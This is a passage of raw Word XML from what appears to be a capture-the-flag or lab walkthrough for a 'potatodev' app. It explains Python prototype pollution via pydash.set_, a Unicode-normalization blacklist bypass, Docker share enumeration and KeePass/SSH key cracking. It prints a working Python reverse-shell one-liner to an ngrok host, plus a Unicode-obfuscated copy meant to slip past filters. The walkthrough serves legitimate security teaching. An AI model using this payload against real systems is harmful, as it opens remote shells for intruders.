    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There are also other special attributes in every object in Python, such as __class__, __doc__, etc, each of these attributes is used for a specific purpose.A special attribute is __kwdefaults__ which stores the mapping of any default values for keyword-only parameters. Polluting this attribute allows us to control the default values of keyword-only parameters of a function, these are the function’s parameters that come after * or *args.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F5">
      <w:pPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="144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6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pictures documented in: </w:t>
      </w:r>
      <w:hyperlink w:anchor="_d2v8nniozo5">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">3.5.3. - Python Prototype Pollution</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In potatodev/potatomanager.py we can see that the PotatoManager class has a set function which can be abused to exploit this vulnerability due to the way pydash.set_ works </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Picture 1)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can also see that there is a supplierconnect function which executes a default command “whoami” </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Picture 2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploiting this vulnerability, we can modify the default command executed by the supplierconnect function.An example request is shown below </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Picture 3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In potatodev/app.py we can see that the /create route executes the set function while the /supplierconnect route executes the supplierconnect function. Using these 2 routes, we can modify the command and execute it. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Picture 4)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FB">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0FC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ektjc73837dj" w:id="24"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.4. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Unicode </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">N</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ormalization</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Unicode normalization occurs when Unicode characters are normalized to ASCII characters. This vulnerability occurs when the system is modifying the user input after having checked it.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The vulnerable code is in potatodev/potatomanager.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FF">
      <w:pPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4572000" cy="1683955"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="41" name="image46.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image46.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:srcRect b="3917" l="822" r="44406" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="168395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0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the set, add and remove functions, we can see that there is a blacklist as well as a check for any alphabets. To bypass this and execute any command we want, we will need to use the Unicode version of the character we want, so that when it is normalized it will become the ASCII character. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000101">
      <w:pPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>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102">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example, if we were to use this reverse shell payload </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table6"/>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python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.tcp.ap.ngrok.io",13769));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")', </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000104">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">using the unicode version of this would look like </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table7"/>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0" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ᵖʸｔℎºⁿ₃ －ᶜ ＇ⁱᵐᵖºᵣｔ ˢºᶜᵏᵉｔ︐ˢᵘᵇᵖᵣºᶜᵉˢˢ︐ºˢ;ˢ⁼ˢºᶜᵏᵉｔ﹒ˢºᶜᵏᵉｔ⁽ˢºᶜᵏᵉｔ﹒Ⓐℱ﹍ᴵᴺᴱＴ︐ˢºᶜᵏᵉｔ﹒Ｓᴼℂᴷ﹍ＳＴᴿᴱⒶᴹ⁾;ˢ﹒ᶜºⁿⁿᵉᶜｔ⁽⁽＂⓪﹒ｔᶜᵖ﹒ªᵖ﹒ⁿᵍᵣºᵏ﹒ⁱº＂︐¹₃₇₆⁹⁾⁾;ºˢ﹒ⅆᵘᵖ₂⁽ˢ﹒ᶠⁱℓᵉⁿº⁽⁾︐⓪⁾; ºˢ﹒ⅆᵘᵖ₂⁽ˢ﹒ᶠⁱℓᵉⁿº⁽⁾︐¹⁾;ºˢ﹒ⅆᵘᵖ₂⁽ˢ﹒ᶠⁱℓᵉⁿº⁽⁾︐₂⁾;ⁱᵐᵖºᵣｔ ᵖｔʸ; ᵖｔʸ﹒ˢᵖªʷⁿ⁽＂ˢℎ＂⁾＇</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000106">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000107">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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dn85kel0ierk" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000108">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nze8ucxjgsqz" w:id="26"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.5. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Final Payload</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When chaining the previously mentioned vulnerabilities, the ultimate payload would resemble the following:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010A">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4114800" cy="4002578"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="47"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4114800" cy="40025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B">
      <w:pPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4114800" cy="2712027"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="39"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4114800" cy="271202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C">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ry47h8zib2q" w:id="27"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.6. Enumeration - Docker Mounted Share</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the enumeration is conducted thoroughly, the attacker would discern that they are operating within a Docker environment. Additionally, the attacker would uncover a shared folder originating from the host machine, which has been mounted within the Docker container. This shared folder can be found at the path "/tmp/share."</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010F">
      <w:pPr>
        <w:spacing w:before="200" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_d0pr59esf5kp" w:id="28"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.7. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cracking Keepass Database Master Password &amp; SSH Private Key</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000111">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Within the docker, there is a secret.kdbx file which is a Keepass database file. secret.kdbx is locked with a master password where the attacker has to crack the password. From there, the attacker will find an SSH private key where they have to crack another password to gain access to the host machine as a normal user. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000112">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps to perform, documented in: </w:t>
      </w:r>
      <w:hyperlink w:anchor="_4u9107drppc4">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">3.7. - Cracking Keepass Database Master Password &amp; SSH Private Key</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000113">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cat the file with base64 encoding, and copy it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000114">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Paste the base64 code in a text editor and convert it back to secret.kdbx </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000115">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
